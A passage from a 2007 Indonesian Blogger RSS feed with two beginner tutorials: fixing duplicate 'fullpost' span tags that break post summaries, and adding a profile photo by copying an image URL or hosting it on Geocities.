class="fullpost"&gt;&lt;br /&gt;Dari pengalaman teman-teman yg sudah mencobanya dan umumnya berhasil, ternyata terkadang mengalami permasalahan sbb: (1) Terkadang, sidebar tidak nongol di halaman muka (front-page); (2) Halaman muka tidak tampil semua, seperti ada penghambat; (3) Keseluruhan posting tetap tampil di halaman muka.&lt;/span&gt;&lt;span class="fullpost"&gt;Solusinya sbb:&lt;/span&gt;&lt;span class="fullpost"&gt;(1) Pastikan sebelum mem-publish posting Anda di blog, Anda klik lagi menu “Edit HTML” di toolbar bagian atas (di samping menu “Compose”);&lt;/span&gt;&lt;/p&gt; &lt;p&gt;(2) Akan tampak SATU kode post-summary pembuka yaitu &lt;span class="”fullpost”"&gt; dan SATU kode post-summary penutup, yaitu &lt;/span&gt;.&lt;/p&gt; &lt;p&gt;(3) Apabila Anda menemukan kode pembuka dan penutup post-summary lebih dari satu di posting yg akan Anda publish, maka di situlah penyakit (bugs)-nya. Yg harus Anda lakukan adalah MENGHAPUSnya.&lt;/p&gt; &lt;p&gt;(4) Setelah menyisakan hanya satu kode pembuka dan satu kode penutup, klik publish.&lt;/p&gt; &lt;p&gt;(5) Selesai dan selamat ngeBLOG.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7712600665289475099-7120686880555502816?l=gresikblog.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://gresikblog.blogspot.com/2007/10/permasalahan-post-summary-abstraksi.html</link><author>noreply@blogger.com (gresikblog)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7712600665289475099.post-3503689164535899917</guid><pubDate>Wed, 31 Oct 2007 23:11:00 +0000</pubDate><atom:updated>2007-10-31T16:21:13.396-07:00</atom:updated><title>Pasang Foto di Profile Blogger/Blogspot</title><description>anyak blogger yg nanya tentang bagaimana cara memasukkan fotonya yg ganteng dan cantik di profile blognya. Berbeda dg di blog gratis lain, di blogger/blogspot, prosesnya agak sedikit rumit bagi yg masih baru di dunia internet. &lt;p&gt;Ada dua cara memasukkan foto :&lt;br /&gt;Cara Pertama:&lt;/p&gt; &lt;p&gt;Upload foto Anda di postingan blog. Caranya:&lt;br /&gt;(a) Setelah login, klik link blog Anda.&lt;br /&gt;(b) Klik menu “posting” atau “Create”&lt;br /&gt;(c) Di toolbar posting ada tombol bergambar panorama warna biru. Klik&lt;br /&gt;di situ, dan akan muncul pop-up window untuk “upload images”&lt;br /&gt;(d) Klik browse ke file foto Anda yg sudah tersimpan di komputer&lt;br /&gt;(e) Klik Upload Image warna biru (tunggu beberapa saat sampai proses&lt;br /&gt;upload selesai)&lt;br /&gt;(f) Klik Done&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;(g) Sekarang foto Anda sudah masuk ke posting. Klik menu “Edit HTML”&lt;br /&gt;di toolbar posting bagian atas sebelah kanan.&lt;br /&gt;(h) Akan tampak sejumlah kode HTML di situ. Copy/paste kode yg berada&lt;br /&gt;setelah tulisan [src=”] yaitu link yg dimulai dg [http://] dan&lt;br /&gt;berakhir dg [.jpg] atau [.jpeg]&lt;br /&gt;(i) Simpan link tsb. di notepad atau ditulis di kertas.&lt;br /&gt;(j) Jangan lupa, klik publish.&lt;br /&gt;(k) Setelah itu, klik menu “Dashboard”&lt;br /&gt;(l) Klik menu “Edit Profile”&lt;br /&gt;(m) Di sini ada menu “Photo URL”, paste link foto Anda tadi di kotak&lt;br /&gt;yg tersedia.&lt;br /&gt;(n) Klik “Save Profile” di bagian paling bawah.&lt;br /&gt;(o) Selesai.&lt;/span&gt;&lt;span class="fullpost"&gt;CARA KEDUA&lt;br /&gt;———————&lt;/span&gt;&lt;span class="fullpost"&gt;Cara kedua adalah dg meng-upload (memasukkan/menyimpan) foto Anda di hosting lain, dan baru kemudian link URL foto tsb. di copy/paste ke profile blogger/blogspot.&lt;/span&gt;&lt;/p&gt; &lt;p&gt;Yg paling mudah, simpan/upload foto Anda di http://geocities.com karena hosting ini milik yahoo.com. Jadi, siapa saja yg memiliki email yahoo dapat langsung log-in ke geocities.com dg memakai id yahoo Anda.&lt;/p&gt; &lt;p&gt;Misalkan file foto Anda adalah jenggot.jpg dan email id Anda site. Maka, nantinya setelah foto itu diupload ke geocities, link url Anda akan menjadi sebagai berikut: http://geocities.com/site/jenggot.jpg. Nah, copy/paste link&lt;br /&gt;tsb. ke profile blogger.com di kolom yg tersedia dan setelah itu SAVE&lt;br /&gt;CHANGES dan REPUBLISH.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7712600665289475099-3503689164535899917?l=gresikblog.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://gresikblog.blogspot.com/2007/10/pasang-foto-di-profile-bloggerblogspot.html</link><author>noreply@blogger.com (gresikblog)</author><thr:total>0</thr:total></item></channel></rss>
